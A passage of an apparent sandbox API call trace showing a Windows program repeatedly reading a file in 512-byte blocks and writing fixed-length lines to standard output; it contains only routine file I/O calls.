lpOverlapped=0x0) returned 1 [0145.374] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.374] GetFileType (hFile=0x50) returned 0x1 [0145.374] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.374] GetFileType (hFile=0x50) returned 0x1 [0145.374] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.374] WriteFile (in: hFile=0x50, lpBuffer=0x18f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.374] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.374] GetFileType (hFile=0x50) returned 0x1 [0145.374] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.374] WriteFile (in: hFile=0x50, lpBuffer=0x18f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f22c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.374] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.374] GetFileType (hFile=0x50) returned 0x1 [0145.374] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.374] WriteFile (in: hFile=0x50, lpBuffer=0x18f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f27c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.374] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.374] GetFileType (hFile=0x50) returned 0x1 [0145.374] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.374] WriteFile (in: hFile=0x50, lpBuffer=0x18f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f2cc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.374] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.374] GetFileType (hFile=0x50) returned 0x1 [0145.374] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.374] WriteFile (in: hFile=0x50, lpBuffer=0x18f31c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f31c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.374] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.374] GetFileType (hFile=0x50) returned 0x1 [0145.374] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.375] WriteFile (in: hFile=0x50, lpBuffer=0x18f36c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f36c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.375] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.375] GetFileType (hFile=0x50) returned 0x1 [0145.375] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.375] WriteFile (in: hFile=0x50, lpBuffer=0x18f3bc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f3bc*, lpNumberOfBytesWritten=0x18e3c0*=0x20, lpOverlapped=0x0) returned 1 [0145.375] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.375] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e3ac | out: lpNewFilePointer=0x0) returned 1 [0145.375] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.375] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.375] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.375] GetFileType (hFile=0x50) returned 0x1 [0145.375] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.375] GetFileType (hFile=0x50) returned 0x1 [0145.375] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.375] WriteFile (in: hFile=0x50, lpBuffer=0x18f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.375] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.375] GetFileType (hFile=0x50) returned 0x1 [0145.375] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.375] WriteFile (in: hFile=0x50, lpBuffer=0x18f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f22c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.375] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.375] GetFileType (hFile=0x50) returned 0x1 [0145.375] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.375] WriteFile (in: hFile=0x50, lpBuffer=0x18f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f27c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.376] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.376] GetFileType (hFile=0x50) returned 0x1 [0145.376] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.376] WriteFile (in: hFile=0x50, lpBuffer=0x18f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f2cc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.376] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.376] GetFileType (hFile=0x50) returned 0x1 [0145.376] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.376] WriteFile (in: hFile=0x50, lpBuffer=0x18f31c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f31c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.376] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.376] GetFileType (hFile=0x50) returned 0x1 [0145.376] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.376] WriteFile (in: hFile=0x50, lpBuffer=0x18f36c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f36c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.376] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.376] GetFileType (hFile=0x50) returned 0x1 [0145.376] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.376] WriteFile (in: hFile=0x50, lpBuffer=0x18f3bc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f3bc*, lpNumberOfBytesWritten=0x18e3c0*=0x20, lpOverlapped=0x0) returned 1 [0145.376] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.376] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e3ac | out: lpNewFilePointer=0x0) returned 1 [0145.376] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.376] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.376] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.376] GetFileType (hFile=0x50) returned 0x1 [0145.376] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.376] GetFileType (hFile=0x50) returned 0x1 [0145.376] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.376] WriteFile (in: hFile=0x50, lpBuffer=0x18f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.377] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.377] GetFileType (hFile=0x50) returned 0x1 [0145.377] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.377] WriteFile (in: hFile=0x50, lpBuffer=0x18f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f22c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.377] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.377] GetFileType (hFile=0x50) returned 0x1 [0145.377] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.377] WriteFile (in: hFile=0x50, lpBuffer=0x18f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f27c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.377] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.377] GetFileType (hFile=0x50) returned 0x1 [0145.377] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.377] WriteFile (in: hFile=0x50, lpBuffer=0x18f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f2cc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.377] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.377] GetFileType (hFile=0x50) returned 0x1 [0145.377] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.377] WriteFile (in: hFile=0x50, lpBuffer=0x18f31c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f31c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.377] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.377] GetFileType (hFile=0x50) returned 0x1 [0145.377] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.377] WriteFile (in: hFile=0x50, lpBuffer=0x18f36c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f36c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.377] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.377] GetFileType (hFile=0x50) returned 0x1 [0145.377] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.377] WriteFile (in: hFile=0x50, lpBuffer=0x18f3bc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f3bc*, lpNumberOfBytesWritten=0x18e3c0*=0x20, lpOverlapped=0x0) returned 1 [0145.377] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.377] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e3ac | out: lpNewFilePointer=0x0) returned 1 [0145.378] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.378] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.378] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.378] GetFileType (hFile=0x50) returned 0x1 [0145.378] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.378] GetFileType (hFile=0x50) returned 0x1 [0145.378] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.378] WriteFile (in: hFile=0x50, lpBuffer=0x18f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.378] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.378] GetFileType (hFile=0x50) returned 0x1 [0145.378] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.378] WriteFile (in: hFile=0x50, lpBuffer=0x18f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f22c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.378] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.378] GetFileType (hFile=0x50) returned 0x1 [0145.378] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.378] WriteFile (in: hFile=0x50, lpBuffer=0x18f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f27c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.378] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.378] GetFileType (hFile=0x50) returned 0x1 [0145.378] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.378] WriteFile (in: hFile=0x50, lpBuffer=0x18f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f2cc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.378] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.378] GetFileType (hFile=0x50) returned 0x1 [0145.378] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.378] WriteFile (in: hFile=0x50, lpBuffer=0x18f31c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f31c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.378] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.378] GetFileType (hFile=0x50) returned 0x1 [0145.378] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.379] WriteFile (in: hFile=0x50, lpBuffer=0x18f36c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f36c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.379] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.379] GetFileType (hFile=0x50) returned 0x1 [0145.379] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.379] WriteFile (in: hFile=0x50, lpBuffer=0x18f3bc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f3bc*, lpNumberOfBytesWritten=0x18e3c0*=0x20, lpOverlapped=0x0) returned 1 [0145.379] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.379] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e3ac | out: lpNewFilePointer=0x0) returned 1 [0145.379] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.379] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.379] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.379] GetFileType (hFile=0x50) returned 0x1 [0145.379] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.379] GetFileType (hFile=0x50) returned 0x1 [0145.379] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.379] WriteFile (in: hFile=0x50, lpBuffer=0x18f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.379] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.379] GetFileType (hFile=0x50) returned 0x1 [0145.379] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.379] WriteFile (in: hFile=0x50, lpBuffer=0x18f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f22c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.379] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.379] GetFileType (hFile=0x50) returned 0x1 [0145.379] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.379] WriteFile (in: hFile=0x50, lpBuffer=0x18f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f27c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.379] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.379] GetFileType (hFile=0x50) returned 0x1 [0145.379] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.379] WriteFile (in: hFile=0x50, lpBuffer=0x18f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f2cc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.380] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.380] GetFileType (hFile=0x50) returned 0x1 [0145.380] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.380] WriteFile (in: hFile=0x50, lpBuffer=0x18f31c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f31c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.380] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.380] GetFileType (hFile=0x50) returned 0x1 [0145.380] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.380] WriteFile (in: hFile=0x50, lpBuffer=0x18f36c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f36c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.380] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.380] GetFileType (hFile=0x50) returned 0x1 [0145.380] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.380] WriteFile (in: hFile=0x50, lpBuffer=0x18f3bc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f3bc*, lpNumberOfBytesWritten=0x18e3c0*=0x20, lpOverlapped=0x0) returned 1 [0145.380] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.380] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e3ac | out: lpNewFilePointer=0x0) returned 1 [0145.380] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.380] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.380] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.380] GetFileType (hFile=0x50) returned 0x1 [0145.380] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.380] GetFileType (hFile=0x50) returned 0x1 [0145.380] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.380] WriteFile (in: hFile=0x50, lpBuffer=0x18f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.380] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.380] GetFileType (hFile=0x50) returned 0x1 [0145.380] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.380] WriteFile (in: hFile=0x50, lpBuffer=0x18f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f22c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.381] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.381] GetFileType (hFile=0x50) returned 0x1 [0145.381] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.381] WriteFile (in: hFile=0x50, lpBuffer=0x18f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f27c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.381] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.381] GetFileType (hFile=0x50) returned 0x1 [0145.381] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.381] WriteFile (in: hFile=0x50, lpBuffer=0x18f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f2cc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.381] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.381] GetFileType (hFile=0x50) returned 0x1 [0145.381] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.381] WriteFile (in: hFile=0x50, lpBuffer=0x18f31c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f31c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.381] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.381] GetFileType (hFile=0x50) returned 0x1 [0145.381] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.381] WriteFile (in: hFile=0x50, lpBuffer=0x18f36c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f36c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.381] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.381] GetFileType (hFile=0x50) returned 0x1 [0145.381] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.381] WriteFile (in: hFile=0x50, lpBuffer=0x18f3bc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f3bc*, lpNumberOfBytesWritten=0x18e3c0*=0x20, lpOverlapped=0x0) returned 1 [0145.381] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.381] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e3ac | out: lpNewFilePointer=0x0) returned 1 [0145.381] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.381] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.381] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.381] GetFileType (hFile=0x50) returned 0x1 [0145.382] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.382] GetFileType (hFile=0x50) returned 0x1 [0145.382] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.382] WriteFile (in: hFile=0x50, lpBuffer=0x18f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.382] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.382] GetFileType (hFile=0x50) returned 0x1 [0145.382] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.382] WriteFile (in: hFile=0x50, lpBuffer=0x18f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f22c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.382] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.382] GetFileType (hFile=0x50) returned 0x1 [0145.382] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.382] WriteFile (in: hFile=0x50, lpBuffer=0x18f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f27c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.382] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.382] GetFileType (hFile=0x50) returned 0x1 [0145.382] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.382] WriteFile (in: hFile=0x50, lpBuffer=0x18f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f2cc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.382] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.382] GetFileType (hFile=0x50) returned 0x1 [0145.382] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.382] WriteFile (in: hFile=0x50, lpBuffer=0x18f31c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f31c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.382] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.382] GetFileType (hFile=0x50) returned 0x1 [0145.382] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.382] WriteFile (in: hFile=0x50, lpBuffer=0x18f36c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f36c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.382] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.382] GetFileType (hFile=0x50) returned 0x1 [0145.383] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.383] WriteFile (in: hFile=0x50, lpBuffer=0x18f3bc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f3bc*, lpNumberOfBytesWritten=0x18e3c0*=0x20, lpOverlapped=0x0) returned 1 [0145.383] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.383] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e3ac | out: lpNewFilePointer=0x0) returned 1 [0145.383] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.383] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.383] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.383] GetFileType (hFile=0x50) returned 0x1 [0145.383] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.383] GetFileType (hFile=0x50) returned 0x1 [0145.383] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.383] WriteFile (in: hFile=0x50, lpBuffer=0x18f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.383] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.383] GetFileType (hFile=0x50) returned 0x1 [0145.383] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.383] WriteFile (in: hFile=0x50, lpBuffer=0x18f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f22c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.383] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.383] GetFileType (hFile=0x50) returned 0x1 [0145.383] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.383] WriteFile (in: hFile=0x50, 